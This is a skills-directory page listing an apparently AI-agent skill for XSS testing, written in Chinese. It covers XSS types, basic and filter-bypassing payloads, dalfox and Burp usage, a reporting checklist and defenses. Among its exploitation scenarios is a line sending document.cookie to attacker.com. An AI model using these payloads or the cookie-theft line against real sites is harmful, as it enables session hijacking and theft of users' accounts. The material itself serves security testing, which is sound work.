Install
mkdir -p .claude/skills/xss-testing && curl -L -o skill.zip "https://mcp.directory/api/skills/download/4391" && unzip -o skill.zip -d .claude/skills/xss-testing && rm skill.zipInstalls to .claude/skills/xss-testing
About this skill
XSS测试技能
概述
跨站脚本攻击(XSS)允许攻击者在受害者的浏览器中执行恶意JavaScript代码。本技能涵盖反射型、存储型和DOM型XSS的测试方法。
XSS类型
1. 反射型XSS (Reflected XSS)
- 恶意脚本通过URL参数传递
- 服务器直接返回包含脚本的响应
- 需要用户点击恶意链接
2. 存储型XSS (Stored XSS)
- 恶意脚本存储在服务器(数据库、文件等)
- 所有访问受影响页面的用户都会执行脚本
- 影响范围更大
3. DOM型XSS (DOM-based XSS)
- 客户端JavaScript处理用户输入不当
- 不涉及服务器端处理
- 通过修改DOM结构触发
测试方法
基础Payload
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
绕过过滤
大小写绕过
<ScRiPt>alert('XSS')</ScRiPt>
编码绕过
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
事件处理器
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<div onmouseover=alert('XSS')>hover</div>
<input onfocus=alert('XSS') autofocus>
伪协议
<a href="javascript:alert('XSS')">click</a>
<iframe src="javascript:alert('XSS')">
高级绕过技术
使用String.fromCharCode
<script>alert(String.fromCharCode(88,83,83))</script>
使用eval和atob
<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>
使用HTML实体
<script>alert('XSS')</script>
工具使用
dalfox
# 基础扫描
dalfox url "http://target.com/page?q=test"
# 指定参数
dalfox url "http://target.com/page" -d "q=test" -X POST
# 使用自定义payload
dalfox url "http://target.com/page?q=test" --custom-payload payloads.txt
Burp Suite
- 使用Intruder模块进行批量测试
- 使用Repeater手动测试
- 使用Scanner自动检测
浏览器控制台
- 测试DOM型XSS
- 检查JavaScript执行环境
- 调试payload
验证和利用
验证步骤
- 确认payload被执行
- 检查是否被过滤或编码
- 测试不同上下文(HTML、JavaScript、属性等)
- 评估影响(Cookie窃取、会话劫持等)
利用场景
- Cookie窃取:
<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script> - 键盘记录:注入键盘事件监听器
- 钓鱼攻击:伪造登录表单
- 会话劫持:获取用户会话token
报告要点
- XSS类型(反射/存储/DOM)
- 触发位置和参数
- 完整的POC
- 影响评估
- 修复建议(输出编码、CSP策略等)
防护措施
- 输入验证和过滤
- 输出编码(HTML、JavaScript、URL)
- Content Security Policy (CSP)
- HttpOnly Cookie标志
- 使用安全的框架和库
More by Ed1s0nZ
View all skills by Ed1s0nZ →You might also like
flutter-development
aj-geddes
Build beautiful cross-platform mobile apps with Flutter and Dart. Covers widgets, state management with Provider/BLoC, navigation, API integration, and material design.
drawio-diagrams-enhanced
jgtolentino
Create professional draw.io (diagrams.net) diagrams in XML format (.drawio files) with integrated PMP/PMBOK methodologies, extensive visual asset libraries, and industry-standard professional templates. Use this skill when users ask to create flowcharts, swimlane diagrams, cross-functional flowcharts, org charts, network diagrams, UML diagrams, BPMN, project management diagrams (WBS, Gantt, PERT, RACI), risk matrices, stakeholder maps, or any other visual diagram in draw.io format. This skill includes access to custom shape libraries for icons, clipart, and professional symbols.
ui-ux-pro-max
nextlevelbuilder
"UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient."
godot
bfollington
This skill should be used when working on Godot Engine projects. It provides specialized knowledge of Godot's file formats (.gd, .tscn, .tres), architecture patterns (component-based, signal-driven, resource-based), common pitfalls, validation tools, code templates, and CLI workflows. The `godot` command is available for running the game, validating scripts, importing resources, and exporting builds. Use this skill for tasks involving Godot game development, debugging scene/resource files, implementing game systems, or creating new Godot components.
nano-banana-pro
garg-aayush
Generate and edit images using Google's Nano Banana Pro (Gemini 3 Pro Image) API. Use when the user asks to generate, create, edit, modify, change, alter, or update images. Also use when user references an existing image file and asks to modify it in any way (e.g., "modify this image", "change the background", "replace X with Y"). Supports both text-to-image generation and image-to-image editing with configurable resolution (1K default, 2K, or 4K for high resolution). DO NOT read the image file first - use this skill directly with the --input-image parameter.
fastapi-templates
wshobson
Create production-ready FastAPI projects with async patterns, dependency injection, and comprehensive error handling. Use when building new FastAPI applications or setting up backend API projects.
Stay ahead of the MCP ecosystem
Get weekly updates on new skills and servers.